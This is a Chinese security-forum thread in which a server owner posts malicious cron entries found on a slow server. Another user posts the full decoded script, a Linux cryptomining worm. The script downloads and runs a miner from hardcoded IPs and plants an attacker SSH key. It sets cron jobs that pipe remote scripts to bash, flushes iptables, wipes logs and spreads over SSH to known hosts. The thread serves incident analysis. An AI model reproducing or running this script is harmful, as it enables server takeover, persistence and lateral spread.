吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 5976|回复: 29
收起左侧

大佬们好,今天发现服务器特别卡顿,发现这两句代码。请大佬教育教育这种坏人

[复制链接]
b_d 发表于 2019-12-5 10:48
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
*/30 * * * *    (curl -s http://122.51.164.83:7770/ash.sh||wget -q -O - http://122.51.164.83:7770/ash.sh)|bash -sh
##
* * * * * wget -q -O - http://185.92.74.42/s.sh | sh > /dev/null 2>&1

免费评分

参与人数 1热心值 +1 收起 理由
hujjgvv + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

JuncoJet 发表于 2019-12-5 11:12
楼主注意下 /root/.ssh/authorized_keys
JuncoJet 发表于 2019-12-5 11:05
解压出来完整代码是这个
[Bash shell] 纯文本查看 复制代码
LOCKFILE=/tmp/aslift.file
if [ -e ${LOCKFILE} ] && kill -0 `cat ${LOCKFILE}`; then
    echo "already running"
    exit
fi
trap "rm -f ${LOCKFILE}; exit" INT TERM EXIT
echo $$ > ${LOCKFILE}
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
rtdir="/etc/sysupdates"
rtdira="/etc/wgeta"
rtdirb="/etc/wgetb"
notls_x86="http://103.85.84.57:20331/notls_x86"
notls_x86_64="http://103.85.84.57:20331/notls_x86"
notls_xxxx="http://103.85.84.57:20331/Linux-syn25000"
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtK7bwC0UwEw8Jq9YycNtQ+cfoIc2jlYLQMzoUSMM0Ck49I7+M9iAc1wpW8/qUWJPA79oXU8ko890PZcRemvgkiwOFtAtCMWO9o3ZSo0Kc23v1ZGte3z5emZLBJGV8uEENa01hq3fdvD5xF24N0Uaxia+9jrxeKVkBllrlmupPZoMwhBTx+if8N6Nrt69NF4kEZdr0mXv45HHwV2zoAXQ7yb6iEVtpme/x5V6trbd2nQRla3wO4iPcaHO7zFW4qOAo4nCPL7wyKGYrlFHdOYOGvQizqnlEldy7Uxb+R+CqEiJ2UN+1XW2iK2MRheQzMGC12ueX76XJ6aBJoqdWWG2uQ== root@VM_0_14_centos' > /root/.ssh/authorized_keys
kill_miner_proc()
{
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
    pkill -f biosetjenkins
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f mgwsl
    pkill -f pythno
    pkill -f jweri
    pkill -f lx26
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f polkitd
    pkill -f nanoWatch
    pkill -f zigw
    pkill -f devtool
    pkill -f systemctI
    pkill -f WmiPrwSe
}

downloads()
{
    if [ -f "/usr/bin/curl" ]
    then 
	echo $1,$2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
	then
		wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

kill_sus_proc()
{
    ps axf -o "pid"|while read procid
    do
            ls -l /proc/$procid/exe | grep /tmp
            if [ $? -ne 1 ]
            then
                    cat /proc/$procid/cmdline| grep -a -E "axlist|axlistc"
                    if [ $? -ne 0 ]
                    then
                            kill -9 $procid
                    else
                            echo "don't kill"
                    fi
            fi
    done
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
    do
            cat /proc/$procid/cmdline| grep -a -E "axlist|axlistc"
            if [ $? -ne 0 ]
            then
                    kill -9 $procid
            else
                    echo "don't kill"
            fi
    done
}

kill_miner_proc
kill_sus_proc


ps -fe|grep axlist |grep -v grep
if [ $? -ne 0 ]; then
	DIR=$(mktemp -d)
	sleep 1s
	downloads $notls_x86 $DIR/axlist
	echo "not tmp runing"
	cd $DIR
	chmod 777 $DIR/axlist
	sleep 5s
	nohup $DIR/axlist &
	chmod 777 $DIR/axlist
	chattr +i $DIR/axlist
else
	echo "tmp runing....."
fi


NTOK=$(netstat --version 2>/dev/null|wc -l)
if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; else NETTOOL='netstat '; fi
port=$(${NETTOOL} -an 2>/dev/null| grep :6389 | wc -l)
self=$(ps aux|grep -v grep|grep -v defunct|grep "axlist"|wc -l)
if [ ${self} -gt 1 ]; then
	ps ax|grep -v grep|grep -v defunct|grep "axlist"|awk 'NR >= 2'| while read pid _; do kill -9 "$pid" >/dev/null 2>&1; done
fi

echo -e "*/10 * * * * root (curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /etc/cron.d/root
echo -e "*/20 * * * * root (curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * *	(curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 [url]http://122.51.164.83:7770/11[/url] -o /etc/cron.hourly/oanacroner1||[url]http://122.51.164.83:7770/11[/url] -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
if crontab -l | grep -q "122.51.164.83"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
	(crontab -l 2>/dev/null; echo "*/15 * * * * $LDR [url]http://122.51.164.83:7770/ash.sh[/url] | bash -sh > /dev/null 2>&1")| crontab -
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
fi
for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
        fi
    fi
done
bash -c 'curl -fsSL 122.51.164.83:7770/bsh.sh|bash' 2>/dev/null

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
b_d + 1 + 1 我很赞同!

查看全部评分

头像被屏蔽
潇湘公子 发表于 2019-12-5 10:55
zwqlon1978 发表于 2019-12-5 10:56
小白路过看不懂
JuncoJet 发表于 2019-12-5 11:03
好像是个gzip的压缩包吧
fjf3997 发表于 2019-12-5 11:07
看不懂耶~~~~
 楼主| b_d 发表于 2019-12-5 11:11
潇湘公子 发表于 2019-12-5 10:55
腾讯云前不久也在不断提示我    我看服务器也有类似的 情况  腾讯云很多都被爆了吗、、、

最好还是定期检查下服务器。
 楼主| b_d 发表于 2019-12-5 11:11

俺也一样
RemMai 发表于 2019-12-5 11:14
服务器被植入了挖矿代码.
xmr.crypto-pool.fr:7777 进入并且翻译,就知道了....
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 14:56

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表